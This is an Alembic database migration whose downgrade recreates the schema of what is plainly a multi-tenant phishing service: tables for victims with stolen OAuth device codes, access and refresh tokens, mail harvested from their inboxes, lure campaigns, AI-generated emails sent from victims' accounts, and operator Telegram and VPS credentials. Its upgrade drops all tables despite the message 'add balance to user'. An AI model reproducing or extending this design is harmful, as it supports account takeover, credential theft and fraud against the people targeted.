"""add balance to user

Revision ID: 6db6313773ac
Revises: 277052e6abc6
Create Date: 2026-08-30 11:18:23.824652

"""
from alembic import op
import sqlalchemy as sa


# revision identifiers, used by Alembic.
revision = '6db6313773ac'
down_revision = '277052e6abc6'
branch_labels = None
depends_on = None


def upgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('campaigns')
    op.drop_table('keyword_rules')
    op.drop_table('victims')
    op.drop_table('harvested_emails')
    op.drop_table('users')
    op.drop_table('domains')
    op.drop_table('b2b_leads')
    op.drop_table('draft_emails')
    op.drop_table('tenants')
    # ### end Alembic commands ###


def downgrade():
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('tenants',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('name', sa.VARCHAR(length=100), nullable=False),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('telegram_bot_token', sa.VARCHAR(length=255), nullable=True),
    sa.Column('telegram_chat_id', sa.VARCHAR(length=50), nullable=True),
    sa.Column('telegram_handle', sa.VARCHAR(length=50), nullable=True),
    sa.Column('vps_ip', sa.VARCHAR(length=50), nullable=True),
    sa.Column('vps_port', sa.INTEGER(), nullable=True),
    sa.Column('vps_username', sa.VARCHAR(length=50), nullable=True),
    sa.Column('vps_auth_method', sa.VARCHAR(length=20), nullable=True),
    sa.Column('vps_password', sa.VARCHAR(length=255), nullable=True),
    sa.Column('vps_ssh_key', sa.TEXT(), nullable=True),
    sa.Column('vps_status', sa.VARCHAR(length=20), nullable=True),
    sa.Column('vps_connected_at', sa.DATETIME(), nullable=True),
    sa.Column('plan', sa.VARCHAR(length=20), nullable=True),
    sa.Column('max_users', sa.INTEGER(), nullable=True),
    sa.Column('max_campaigns', sa.INTEGER(), nullable=True),
    sa.Column('max_tokens', sa.INTEGER(), nullable=True),
    sa.Column('max_leads', sa.INTEGER(), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('name')
    )
    op.create_table('draft_emails',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('to_email', sa.VARCHAR(length=120), nullable=False),
    sa.Column('subject', sa.VARCHAR(length=500), nullable=False),
    sa.Column('body', sa.TEXT(), nullable=False),
    sa.Column('ai_generated', sa.BOOLEAN(), nullable=True),
    sa.Column('status', sa.VARCHAR(length=20), nullable=True),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('sent_at', sa.DATETIME(), nullable=True),
    sa.Column('campaign_id', sa.INTEGER(), nullable=False),
    sa.Column('from_victim_id', sa.INTEGER(), nullable=False),
    sa.ForeignKeyConstraint(['campaign_id'], ['campaigns.id'], ),
    sa.ForeignKeyConstraint(['from_victim_id'], ['victims.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('b2b_leads',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('target_email', sa.VARCHAR(length=120), nullable=False),
    sa.Column('provider', sa.VARCHAR(length=50), nullable=True),
    sa.Column('verification_score', sa.INTEGER(), nullable=True),
    sa.Column('is_contacted', sa.BOOLEAN(), nullable=True),
    sa.Column('is_verified', sa.BOOLEAN(), nullable=True),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('campaign_id', sa.INTEGER(), nullable=False),
    sa.ForeignKeyConstraint(['campaign_id'], ['campaigns.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('domains',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('domain', sa.VARCHAR(length=100), nullable=False),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('tenant_id', sa.INTEGER(), nullable=False),
    sa.ForeignKeyConstraint(['tenant_id'], ['tenants.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('domain')
    )
    op.create_table('users',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('username', sa.VARCHAR(length=80), nullable=False),
    sa.Column('email', sa.VARCHAR(length=120), nullable=True),
    sa.Column('password_hash', sa.VARCHAR(length=200), nullable=False),
    sa.Column('role', sa.VARCHAR(length=20), nullable=True),
    sa.Column('is_active', sa.BOOLEAN(), nullable=True),
    sa.Column('expiry_date', sa.DATETIME(), nullable=True),
    sa.Column('subscription', sa.VARCHAR(length=20), nullable=True),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('last_login', sa.DATETIME(), nullable=True),
    sa.Column('tenant_id', sa.INTEGER(), nullable=True),
    sa.Column('smtp_enabled', sa.BOOLEAN(), nullable=True),
    sa.Column('smtp_server', sa.VARCHAR(length=100), nullable=True),
    sa.Column('smtp_port', sa.INTEGER(), nullable=True),
    sa.Column('smtp_username', sa.VARCHAR(length=100), nullable=True),
    sa.Column('smtp_password', sa.VARCHAR(length=255), nullable=True),
    sa.Column('smtp_from_email', sa.VARCHAR(length=120), nullable=True),
    sa.Column('smtp_from_name', sa.VARCHAR(length=100), nullable=True),
    sa.Column('smtp_use_tls', sa.BOOLEAN(), nullable=True),
    sa.ForeignKeyConstraint(['tenant_id'], ['tenants.id'], ),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('email'),
    sa.UniqueConstraint('username')
    )
    op.create_table('harvested_emails',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('sender', sa.VARCHAR(length=120), nullable=False),
    sa.Column('recipient', sa.VARCHAR(length=120), nullable=True),
    sa.Column('subject', sa.VARCHAR(length=500), nullable=True),
    sa.Column('body_preview', sa.TEXT(), nullable=True),
    sa.Column('received_date', sa.VARCHAR(length=50), nullable=True),
    sa.Column('provider', sa.VARCHAR(length=50), nullable=True),
    sa.Column('verification_score', sa.INTEGER(), nullable=True),
    sa.Column('is_verified', sa.BOOLEAN(), nullable=True),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('victim_id', sa.INTEGER(), nullable=False),
    sa.ForeignKeyConstraint(['victim_id'], ['victims.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('victims',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('user_code', sa.VARCHAR(length=20), nullable=True),
    sa.Column('device_code', sa.VARCHAR(length=100), nullable=True),
    sa.Column('access_token', sa.TEXT(), nullable=True),
    sa.Column('refresh_token', sa.TEXT(), nullable=True),
    sa.Column('status', sa.VARCHAR(length=20), nullable=True),
    sa.Column('email', sa.VARCHAR(length=120), nullable=True),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('last_used', sa.DATETIME(), nullable=True),
    sa.Column('campaign_id', sa.INTEGER(), nullable=False),
    sa.ForeignKeyConstraint(['campaign_id'], ['campaigns.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('keyword_rules',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('keyword', sa.VARCHAR(length=100), nullable=False),
    sa.Column('category', sa.VARCHAR(length=50), nullable=True),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('tenant_id', sa.INTEGER(), nullable=False),
    sa.ForeignKeyConstraint(['tenant_id'], ['tenants.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('campaigns',
    sa.Column('id', sa.INTEGER(), nullable=False),
    sa.Column('name', sa.VARCHAR(length=200), nullable=False),
    sa.Column('status', sa.VARCHAR(length=20), nullable=True),
    sa.Column('created_at', sa.DATETIME(), nullable=True),
    sa.Column('template_id', sa.VARCHAR(length=50), nullable=True),
    sa.Column('sender_name', sa.VARCHAR(length=100), nullable=True),
    sa.Column('document_title', sa.VARCHAR(length=200), nullable=True),
    sa.Column('document_type', sa.VARCHAR(length=20), nullable=True),
    sa.Column('exit_url', sa.VARCHAR(length=500), nullable=True),
    sa.Column('language', sa.VARCHAR(length=20), nullable=True),
    sa.Column('token_type', sa.VARCHAR(length=50), nullable=True),
    sa.Column('tenant_id', sa.INTEGER(), nullable=False),
    sa.ForeignKeyConstraint(['tenant_id'], ['tenants.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
